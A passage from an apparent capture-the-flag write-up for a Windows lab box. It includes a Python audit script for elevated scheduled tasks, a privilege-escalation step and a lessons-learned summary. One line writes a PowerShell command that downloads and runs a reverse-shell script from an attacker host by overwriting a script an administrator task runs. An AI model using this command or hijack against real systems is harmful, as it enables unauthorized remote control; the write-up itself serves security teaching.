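      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>TALLY\Administrator</UserId>
      <LogonType>Password</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>PowerShell.exe</Command>
      <Arguments>-ExecutionPolicy Bypass -File SPBestWarmUp.ps1 -skipadmincheck</Arguments>
      <WorkingDirectory>C:\Users\Sarah\Desktop</WorkingDirectory>
    </Exec>
  </Actions>
</Task>
"""

# "-File <path>" argument of powershell.exe, quoted or bare.
FILE_ARG_RE = re.compile(r'(?i)-file\s+(?:"([^"]+)"|(\S+))')
# A path inside a user profile; group 1 is the profile's user name.
USER_PROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\([^\\]+)\\", re.IGNORECASE)


def script_path_from_exec(exec_el):
    """Resolve the script an Exec action runs via -File, relative to its WorkingDirectory."""
    args = exec_el.findtext("t:Arguments", default="", namespaces=NS) or ""
    workdir = exec_el.findtext("t:WorkingDirectory", default="", namespaces=NS) or ""
    m = FILE_ARG_RE.search(args)
    if not m:
        return None
    script = m.group(1) or m.group(2)
    return ntpath.normpath(ntpath.join(workdir, script))  # absolute script path wins


def audit_task(xml_text):
    """Return findings for one exported task: the task runs elevated (heuristic:
    RunLevel HighestAvailable, or the Administrator/SYSTEM account) and executes a
    script stored in a profile directory that belongs to a different user."""
    root = ET.fromstring(xml_text)
    principal = root.find("t:Principals/t:Principal", NS)
    if principal is None:
        return []
    user_id = principal.findtext("t:UserId", default="", namespaces=NS) or ""
    run_level = principal.findtext("t:RunLevel", default="", namespaces=NS) or ""
    account = user_id.split("\\")[-1].lower()
    elevated = run_level == "HighestAvailable" or account in ("administrator", "system")
    if not elevated:
        return []
    findings = []
    for exec_el in root.iterfind("t:Actions/t:Exec", NS):
        path = script_path_from_exec(exec_el)
        if path is None:
            continue
        m = USER_PROFILE_RE.match(path)
        if m and m.group(1).lower() != account:
            findings.append({"principal": user_id, "run_level": run_level,
                             "script": path, "profile_owner": m.group(1)})
    return findings


if __name__ == "__main__":
    for f in audit_task(SAMPLE_TASK_XML):
        print("elevated task runs user-writable script:", f)
```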
Change the content of the script to send a reverse shell back to our attack machine.
echo "iex(new-object net.webclient).downloadstring('http://10.10.14.45:5555/shell-2.ps1')" > SPBestWarmUp.ps1
Wait until the scheduled task is run. We get a shell!
We can view the scheduled tasks using the following command.
Grab the root.txt flag.

Lessons Learned
To gain an initial foothold on the box we exploited four vulnerabilities.
- Insecure SharePoint permissions. An anonymous user was allowed to access SharePoint content. We used that to our advantage to enumerate site pages and documents on SharePoint. The administrator should have secured/restricted external anonymous access, especially when it is a public-facing website.
- Cleartext FTP credentials. After enumerating the content saved on SharePoint, we found a document that contains an FTP password and a site page that contains the username that corresponded to the password. We then used these credentials to log into the FTP server. Sensitive information should not be stored in cleartext and permission restrictions should be put in place that prevent an unauthorized user from accessing files that contain sensitive information.
- Weak authentication credentials. After logging into the FTP server, we found a KeePass database that was protected with a weak password. Clearly, the user is security-aware and therefore is using a KeePass database to store his passwords. However, the password to the database was not strong enough and therefore we were able to crack it in a matter of seconds and gain access to all the other passwords that the user had stored in the database. The user should have used a strong password that is difficult to crack.
- Hardcoded password in an executable. After cracking the password for the KeePass database, we found SMB credentials that allowed us to log into one of the shares. There, we found a custom executable file that contained a hardcoded SQL system administrator (SA) password. Using these credentials, we logged into the SQL database and executed system commands to gain initial access on the box. It’s considered insecure practice to store passwords in applications. If it is absolutely necessary, there are several ways you can obscure these passwords and make it harder for an attacker to discover them. However, with enough skill, time and motive, the attacker will be able to recover the passwords.
To escalate privileges we exploited one vulnerability.
- Security misconfiguration. There is a scheduled task that runs a user-owned file with administrator privileges. Since we owned the file, we simply changed the content of the file to send a reverse shell back to our attack machine. To avoid this vulnerability, the scheduled task should have been run with user privileges as opposed to administrator privileges. Or, restrictions should have been put on the script that only allow an administrator to change the file.